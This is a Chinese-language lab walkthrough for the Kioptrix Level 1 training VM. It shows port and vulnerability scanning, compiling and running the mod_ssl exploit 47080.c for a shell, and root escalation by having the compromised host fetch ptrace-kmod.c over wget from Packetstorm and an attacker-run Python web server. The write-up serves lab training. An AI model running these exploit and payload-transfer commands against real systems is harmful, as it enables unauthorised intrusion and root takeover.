渗透测试-Kioptix Level 1靶机getshell及提权教程

声明!

学习视频来自B站up主 泷羽sec 有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!

工具地址:

通过网盘分享的文件:OSCP靶场

链接: https://pan.baidu.com/s/1wBBiYvvlJ-Pvp1-w-viqYA 提取码: jay1

一、准备

1. 扫描ip和端口

kali:192.168.108.130

靶机:192.168.108.135

复制代码
nmap -sn 192.168.108.0/24

找出开放端口

复制代码
nmap -p 1-65535 ip
nmap -sV ip

或使用指纹探测

复制代码
nmap 192.168.108.135 -p 22,80,111,139,443,1024 -sV -sC -O --version-all

扫描出来的开放端口及服务信息

复制代码
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: djiMYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)

可利用信息

Apache httpd 1.3.20

mod_ssl/2.8.4

OpenSSL/0.9.6b

2. 查找漏洞

nmap漏洞探测

复制代码
nmap 192.168.108.135 -p 22,80,111,139,443,1024 -oA --script=vuln

会扫描出来很多漏洞

进行目录扫描

复制代码
dirb http://192.168.108.135/

扫描出一些网页

信息如下:

http://192.168.108.135/manual/

http://192.168.108.135/mrtg/

http://192.168.108.135/usage/

http://192.168.108.135/usage/index.html

访问可以看到一些信息

查看历史漏洞

复制代码
searchsploit Apache 1.3.20
searchsploit mod_ssl
searchsploit OpenSSL

Apache:

mod_ssl:

OpenSSL:

由于kali自带exp无法直接利用,需要去官网下载使用,右边搜索漏洞名称

二、漏洞脚本利用

成功的脚本不止一个,这里我们以47080.c 为例

这里我使用47080.c这个,拿到exp后

在脚本所在文件夹下执行

复制代码
gcc -o 47080 47080.c -lcrypto

会出现以下信息

ls命令查看

此时脚本编译完成

执行脚本查找Apache 1.3.20 历史漏洞利用

复制代码
./47080 | grep "1.3.20"

结果如下

有很多利用exp,我们尝试成功的是0x6b,执行

复制代码
./47080 0x6b 192.168.108.135 -c 40

此时发现就getshell了,但是查看发现只是Apache的权限

三、提权

执行以下命令下载提权脚本

复制代码
wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

下载完成之后 ls 查看一下

然后另开一个命令面板,执行以下命令,开启web服务

复制代码
cd 提权脚本所在路径
sudo python -m http.server 80

在浏览器里可以查看

可以看到脚本在web服务里,在刚才Apache权限下执行命令下载提权脚本

复制代码
wget http://192.168.108.130:80/ptrace-kmod.c

exit 退出

执行以下命令再次连接

复制代码
sudo ./47080 0x6b 192.168.108.135 443 -c 40

此时连接成功,并且是root权限

四、总结

这个靶机可以利用的exp方式还有很多,以上只是其中一种,想要完成掌握还需要多加学习

相关推荐
nixiaoge1 小时前
RCE漏洞
网络安全
禾木KG2 小时前
网络安全-等级保护(等保) 1-0 等级保护制度公安部前期发文总结
网络安全
网络抓包与爬虫2 小时前
Wireshark——抓包分析
websocket·网络协议·tcp/ip·http·网络安全·https·udp
仙女很美哦3 小时前
Flutter视频播放、Flutter VideoPlayer 视频播放组件精要
websocket·网络协议·tcp/ip·http·网络安全·https·udp
CYRUS STUDIO5 小时前
Unidbg Trace 反 OLLVM 控制流平坦化(fla)
android·汇编·算法·网络安全·逆向·ollvm
写代码的小王吧5 小时前
【Java可执行命令】(十)JAR文件签名工具 jarsigner:通过数字签名及验证保证代码信任与安全,深入解析 Java的 jarsigner命令~
java·开发语言·网络·安全·web安全·网络安全·jar
iOS技术狂热者9 小时前
Flutter 音视频播放器与弹幕系统开发实践
websocket·网络协议·tcp/ip·http·网络安全·https·udp
予安灵9 小时前
XSS 攻击(详细)
前端·web安全·网络安全·网络攻击模型·xss·安全架构·xss攻击
网络抓包与爬虫11 小时前
flutter WEB端启动优化(加载速度,加载动画)
websocket·网络协议·tcp/ip·http·网络安全·https·udp